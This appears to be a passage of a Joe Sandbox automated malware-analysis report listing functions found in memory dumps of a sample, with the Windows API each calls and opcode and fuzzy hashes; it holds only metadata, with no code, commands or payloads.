                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ForegroundWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2020703349-0
                                                                                    • Opcode ID: 228028ac97d35942a0ab459fdde83ed782109fe22ddb2759a427a376a866c82a
                                                                                    • Instruction ID: fc645458d3efcb06d20122dffef9cd5b22ae8cce427e667befbb522814c932a3
                                                                                    • Opcode Fuzzy Hash: 228028ac97d35942a0ab459fdde83ed782109fe22ddb2759a427a376a866c82a
                                                                                    • Instruction Fuzzy Hash: E6216AB1A003488FDB21DFA9D5447EEBBF1BB88210F68442AD516A7340C7359945CBA4
                                                                                    Function 079D75E0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,079D6EEF,00000000,0435412C,033708D8,00000000,?), ref: 079D764D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: d88da10d5d6467ac07bb57ebb9586294bee8a0918f91e45c4a77bbe2c7e36a41
                                                                                    • Instruction ID: c7a158a1653046542f45631fb86afc65f48eb155b395428b5d025cf29e482990
                                                                                    • Opcode Fuzzy Hash: d88da10d5d6467ac07bb57ebb9586294bee8a0918f91e45c4a77bbe2c7e36a41
                                                                                    • Instruction Fuzzy Hash: 1D11E4B68007599FDB10CF9AD845BDEFBF8EB48324F10842AE558A3640D379A544CFA5
                                                                                    Function 0CCD4F90 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0CCD4FAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: cd6c1155f1853a375dedcfa8b62755a05bcb268b43ee00cf8aa48dc3737e0bc6
                                                                                    • Instruction ID: 29e2a9386ebeeaf54991d7eef78c28b6f725d3da93188c7510caad7de8bea8b2
                                                                                    • Opcode Fuzzy Hash: cd6c1155f1853a375dedcfa8b62755a05bcb268b43ee00cf8aa48dc3737e0bc6
                                                                                    • Instruction Fuzzy Hash: AE116D743105108FCA29AA3DC41486E77EAAFC5A5032640A9E702CB3B5DEB2EC03CB91
                                                                                    Function 0C0441F0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 0C044259
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ForegroundWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2020703349-0
                                                                                    • Opcode ID: 2f87e03664936048821c42640b2db43b87b081a4ec53a060a2c6575652e9cdfe
                                                                                    • Instruction ID: 2251b70595b93a1b01a6fee7e4f48172df74ef848fc7f613dcfe14175b9b489f
                                                                                    • Opcode Fuzzy Hash: 2f87e03664936048821c42640b2db43b87b081a4ec53a060a2c6575652e9cdfe
                                                                                    • Instruction Fuzzy Hash: 361189B0A003088FCB20DFA9C5447DFBBF5BB88210F64442AD516A7340DB75A545CFA5
                                                                                    Function 07CE041C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07CE311A,?,?,?,?,?), ref: 07CE31BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFromIconResource
                                                                                    • String ID:
                                                                                    • API String ID: 3668623891-0
                                                                                    • Opcode ID: 0879b413aeaadc356cb3acc88e1708bf23e9aacd73c33d5a57998e8662bc821c
                                                                                    • Instruction ID: d8aa5ba7bfce01286d373052d7a0dde4a7c4bae6b0fcdc7245e1894e021d8678
                                                                                    • Opcode Fuzzy Hash: 0879b413aeaadc356cb3acc88e1708bf23e9aacd73c33d5a57998e8662bc821c
                                                                                    • Instruction Fuzzy Hash: 421129B59002599FDB10CF9AC844BDEBFF8EB48310F14845AE915A7250C379A954CFA5
                                                                                    Function 0CCD4F88 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0CCD4FAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1363943004.000000000CCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ccd0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 3feace91180cdfb321b693e1363175920c1aebcb6d3822d72cc52882b24d5f1f
                                                                                    • Instruction ID: f7bf6d31fe6fcf2df7e060148ae3280fc30a9af09f3f35780e0cb67d92e3c3fb
                                                                                    • Opcode Fuzzy Hash: 3feace91180cdfb321b693e1363175920c1aebcb6d3822d72cc52882b24d5f1f
                                                                                    • Instruction Fuzzy Hash: 6B116D743105508FCB29AB3DC4548AA77AAAFC5A5031640A9E702CB375DE72DC03CB90
                                                                                    Function 0C0430D8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0C04314A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    • Opcode ID: 77e02472d671e0f02d7033750a2dffede34447fc86ee0c905e2138eb2f57c7ab
                                                                                    • Instruction ID: 0ae6c85aee91a579fdec2193125c650c90df5a5b93b292fb9ab1974067e99423
                                                                                    • Opcode Fuzzy Hash: 77e02472d671e0f02d7033750a2dffede34447fc86ee0c905e2138eb2f57c7ab
                                                                                    • Instruction Fuzzy Hash: 7C1144B6D002499FDB10CF9AC844BDFFBF4EB88720F10802AE858A3650C338A545CFA5
                                                                                    Function 079D5BF8 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,079D6E62,00000000,00000000,0435412C,033708D8), ref: 079D72B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
                                                                                    • Opcode ID: cad5bc3d0c7a7cd39178fd2adedbe5a82e8a3f3a154100c9fd845441bf36e303
                                                                                    • Instruction ID: bf82b6dcd87d8eb66cac2e314c53151ffda93f827bccb035b09ccc0ece001784
                                                                                    • Opcode Fuzzy Hash: cad5bc3d0c7a7cd39178fd2adedbe5a82e8a3f3a154100c9fd845441bf36e303
                                                                                    • Instruction Fuzzy Hash: D61114B5C002499FDB10CF9AD844BDEBBF8EB48324F10842AE958A3240D378A944CFA5
                                                                                    Function 079D5C10 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,079D6EEF,00000000,0435412C,033708D8,00000000,?), ref: 079D764D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: a4f2347ef382cf1d421e62386425afd9f87a73223084259a49a532d3afd901eb
                                                                                    • Instruction ID: 0042a3f1b997e7e1186e06c71043664949842a32347e43506b69f21fd733bbc6
                                                                                    • Opcode Fuzzy Hash: a4f2347ef382cf1d421e62386425afd9f87a73223084259a49a532d3afd901eb
                                                                                    • Instruction Fuzzy Hash: 451126B5C003499FDB10CF9AD844BDEFBF8EB08314F10842AE418A3240D378A944CFA5
                                                                                    Function 079D7240 Relevance: 1.6, APIs: 1, Instructions: 54windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,079D6E62,00000000,00000000,0435412C,033708D8), ref: 079D72B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
                                                                                    • Opcode ID: 064b3994b034edb035a39f55f66c2bdbcca7bb1af37671510cfa558bcfa6c3a1
                                                                                    • Instruction ID: 8970b51ff962cae97c1969e8cb82299787de3dd897d56c5b64ceb56dfd92ed72
                                                                                    • Opcode Fuzzy Hash: 064b3994b034edb035a39f55f66c2bdbcca7bb1af37671510cfa558bcfa6c3a1
                                                                                    • Instruction Fuzzy Hash: 0711E4B5C00249DFDB10CF9AD844BDEBBF4EB48324F14842AE958A7650D379A944CFA5
                                                                                    Function 0C0430E0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0C04314A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 530164218-0
                                                                                    • Opcode ID: 2900bdb7fa92b1fc71b42b59ef7dad110b9a523163d835b85f5707c0133b4d64
                                                                                    • Instruction ID: 8c76846ae2caf443a6ecf99a51ac4902c9caef05dcd1b79a1eeb6e13505da74b
                                                                                    • Opcode Fuzzy Hash: 2900bdb7fa92b1fc71b42b59ef7dad110b9a523163d835b85f5707c0133b4d64
                                                                                    • Instruction Fuzzy Hash: 1F1123B6D002499FDB14CF9AC844BDFFBF4EB88720F10842AE858A7650D339A545CFA5
                                                                                    Function 0755CCC0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0755CD2E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: f6aa580f67d5d8e9303981b956824d19798cdedb3d8be24767cfa5e683a9ab12
                                                                                    • Instruction ID: 68b09a698e59dd78d174d3466182b891335fc704a08cf6aed9ceff0e9a5f9299
                                                                                    • Opcode Fuzzy Hash: f6aa580f67d5d8e9303981b956824d19798cdedb3d8be24767cfa5e683a9ab12
                                                                                    • Instruction Fuzzy Hash: 121126728003499FDB24DFAAC844BDEBBF5EB48314F14881AE915A7250C779A540CBA5
                                                                                    Function 0755CB38 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 41ffc17ecfc342433e48710ac37d73ce88fa67943c412fdb57a550d851891d7e
                                                                                    • Instruction ID: f95876b1978301eca7a208e7bd19a112334aa5c9e613482920e4c760be4b0760
                                                                                    • Opcode Fuzzy Hash: 41ffc17ecfc342433e48710ac37d73ce88fa67943c412fdb57a550d851891d7e
                                                                                    • Instruction Fuzzy Hash: AB113AB1D003498FDB24DFAAC444BDEFBF4AB48324F14841ED419A7640C779A940CBA9
                                                                                    Function 079D2068 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 079D20C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 9e374a762a1088bc52423440e0148780c3e537e76eef7e1eb54e656ef40ef306
                                                                                    • Instruction ID: 3eceecdaa229f89c85a4459fdc49bbaac5afd1bf9fe33f37465389dc14f21f3a
                                                                                    • Opcode Fuzzy Hash: 9e374a762a1088bc52423440e0148780c3e537e76eef7e1eb54e656ef40ef306
                                                                                    • Instruction Fuzzy Hash: D51106B58003499FDB10CF9AC845BDEFBF8FB48324F10841AE554A3650D379A944CFA5
                                                                                    Function 058B1F30 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 058B1F95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1378638983-0
                                                                                    • Opcode ID: 3f5033d1ba94d20e7cb4220f60e3be89e326ff61e494c5dd089c3eb089b4d4b0
                                                                                    • Instruction ID: 0acdd84cf604335c834fb6d5343095b0abe9788b99e4ca31053660d27f3754d5
                                                                                    • Opcode Fuzzy Hash: 3f5033d1ba94d20e7cb4220f60e3be89e326ff61e494c5dd089c3eb089b4d4b0
                                                                                    • Instruction Fuzzy Hash: ED1136B58003489FDB10CF9AD885BDEBBF8FB49314F10855AE958A7300C379A944CFA5
                                                                                    Function 079D7AB8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,079D6FA7), ref: 079D7B1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: b2d52ddcd25bcef1f97c4094e2e849406c1e7cd63dbf7592e9c9da7c47a53e65
                                                                                    • Instruction ID: 23ae32d694f977d6372461eed87904c9a3cd7954534c86fd9b852b1b5134b796
                                                                                    • Opcode Fuzzy Hash: b2d52ddcd25bcef1f97c4094e2e849406c1e7cd63dbf7592e9c9da7c47a53e65
                                                                                    • Instruction Fuzzy Hash: 461122B1C003598FCB20CF9AE444BCEFBF4AB48314F10842AE418A7610C379A644CFA5
                                                                                    Function 01B0B0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 01B0B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: e31d6c87c11f0e78ededa86046c3137fbe3b978ca6a1e2a14a7075fc7eadfc85
                                                                                    • Instruction ID: a04b2d9d640d30d4494ad4465b2e97c62aee6ba604ee992bedb1a844fedb9dae
                                                                                    • Opcode Fuzzy Hash: e31d6c87c11f0e78ededa86046c3137fbe3b978ca6a1e2a14a7075fc7eadfc85
                                                                                    • Instruction Fuzzy Hash: 48110FB6C102498FDB24CF9AD944ADEFBF4EB88214F10846AD418A7640C379A545CFA5
                                                                                    Function 079D5C44 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,079D6FA7), ref: 079D7B1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: dcbc0172402c44076a00941ce02f1398dc88b6ea374b7aed27f4e57402952cfd
                                                                                    • Instruction ID: be8cc93b6ce6a8040b49dd06291b6521b16e900c88aaf5a42011c7c0c8e2f845
                                                                                    • Opcode Fuzzy Hash: dcbc0172402c44076a00941ce02f1398dc88b6ea374b7aed27f4e57402952cfd
                                                                                    • Instruction Fuzzy Hash: C31122B5C002499FCB20CF9AD844BDEFBF4EB48314F10842AE419A3300C378A940CFA5
                                                                                    Function 0C04DAF1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0C04DB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 2dc8bbc4009f28599bd54fb5af9366ccf51d95443d58fad4f0249aab9575f62b
                                                                                    • Instruction ID: 5d24408a74a831316f4263df00f38da2da09a4bc5014861b1b95145f56d2f5c4
                                                                                    • Opcode Fuzzy Hash: 2dc8bbc4009f28599bd54fb5af9366ccf51d95443d58fad4f0249aab9575f62b
                                                                                    • Instruction Fuzzy Hash: 281133B5800348DFDB20CF9AD884BDEBBF4EB48314F20841AE418A7600C379A540CFA9
                                                                                    Function 0C04DAF8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0C04DB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: a934e5f42f56fc9028b5725d344216f2a0d11538f6269fa018ecd478c616e686
                                                                                    • Instruction ID: 6f2fab97a68c8c2c3e2ff94fb9059ff53724b81aa27edbbfda42c5ea977a1c70
                                                                                    • Opcode Fuzzy Hash: a934e5f42f56fc9028b5725d344216f2a0d11538f6269fa018ecd478c616e686
                                                                                    • Instruction Fuzzy Hash: F811D3B5800349DFDB10CF9AD885BDEBBF8EB48314F10841AE558A7650C379A544CFA5
                                                                                    Function 058B1F38 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,?,?), ref: 058B1F95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1378638983-0
                                                                                    • Opcode ID: 967b7684d193cf00874684d9471cf30ffaead9d08fbbb0d4b1c38c826cd03c61
                                                                                    • Instruction ID: bec58bdbe98885dfa57b706977d998e7c5ea0da89de87761b09723f3aa1af88e
                                                                                    • Opcode Fuzzy Hash: 967b7684d193cf00874684d9471cf30ffaead9d08fbbb0d4b1c38c826cd03c61
                                                                                    • Instruction Fuzzy Hash: 4B1103B58002499FDB10CF9AD484BDEBBF8EB48324F10841AE918A7740C379A944CFA5
                                                                                    Function 07CE0358 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07CE2422
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 44fd6a5d206698c4bcf2706281f9f2944b51cd4ace55fc50fd834a94d4bffd3b
                                                                                    • Instruction ID: 04daa56ad78baa167043e473af41ccc58297d36eb59becbfb296b64cf7cd5a66
                                                                                    • Opcode Fuzzy Hash: 44fd6a5d206698c4bcf2706281f9f2944b51cd4ace55fc50fd834a94d4bffd3b
                                                                                    • Instruction Fuzzy Hash: A0E086B17607145BC624FB799854D6B77AEEF89D20350496EE406CB360CEE0DC0283E5
                                                                                    Function 07CE23F3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 07CE2422
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 04eaddbf08f5424c4ce77f8ccdd7618158676e120f0de1ff7421488e29533bb7
                                                                                    • Instruction ID: acc7a4df16707da26d1243f36ecff52aeff1caa2a08e69abac9d6dce48290f66
                                                                                    • Opcode Fuzzy Hash: 04eaddbf08f5424c4ce77f8ccdd7618158676e120f0de1ff7421488e29533bb7
                                                                                    • Instruction Fuzzy Hash: 39E04F723607145BC714AB39D809A2B77ADEF88920B44456EE405CB3A1CEA4DC01C7A5
                                                                                    Function 0180D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303669618.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_180d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dd2c9108374669ee026deb504bfd94aad4b023615d388a40dc024cba18910cfa
                                                                                    • Instruction ID: b1e6299e61a691193ba944a6882ba4b1285ee03cfdd1256fd2bdbbefe07b3241
                                                                                    • Opcode Fuzzy Hash: dd2c9108374669ee026deb504bfd94aad4b023615d388a40dc024cba18910cfa
                                                                                    • Instruction Fuzzy Hash: 3B213671500208DFDB56DF94D9C0B26BF61FB88318F20C669EC054F296C336D546CAA2
                                                                                    Function 0180D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303669618.000000000180D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0180D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_180d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f9655548ab24275388f21fad86c2ea3527a0dc5fb031859dedcd39e2e953d63c
                                                                                    • Instruction ID: 8d6d1af3fc66560cb3cfbe165d7de7d2283fcffd6f52fee1de37003638a84e2b
                                                                                    • Opcode Fuzzy Hash: f9655548ab24275388f21fad86c2ea3527a0dc5fb031859dedcd39e2e953d63c
                                                                                    • Instruction Fuzzy Hash: 14214871500608DFDB16DF94DDC0B56BBA5FB84324F20C26DE9098F296C336E546CAA2
                                                                                    Function 0181D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303705467.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_181d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d549bb6839f894e334b48001f06fac35cba165ae0dbfb157d8c1084b3ebb816
                                                                                    • Instruction ID: f413ffe8ab49ce41cd950596709b2acea352ea9a631f53fce8b242fe57eb0fe9
                                                                                    • Opcode Fuzzy Hash: 0d549bb6839f894e334b48001f06fac35cba165ae0dbfb157d8c1084b3ebb816
                                                                                    • Instruction Fuzzy Hash: 76216772904304EFDB01DF94D5C8B55BBA9FB84328F20C76DE8098F24AC336E506CA61
                                                                                    Function 0181D01C Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303705467.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_181d000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 50300a245969d713d1a10bff92c077e6768fdece5364c217d34b5b9d58385b86
                                                                                    • Instruction ID: e566589c2b3f1211bdb5c2615b95040ca77ea629b1e9468540ee698030edf7b1
                                                                                    • Opcode Fuzzy Hash: 50300a245969d713d1a10bff92c077e6768fdece5364c217d34b5b9d58385b86
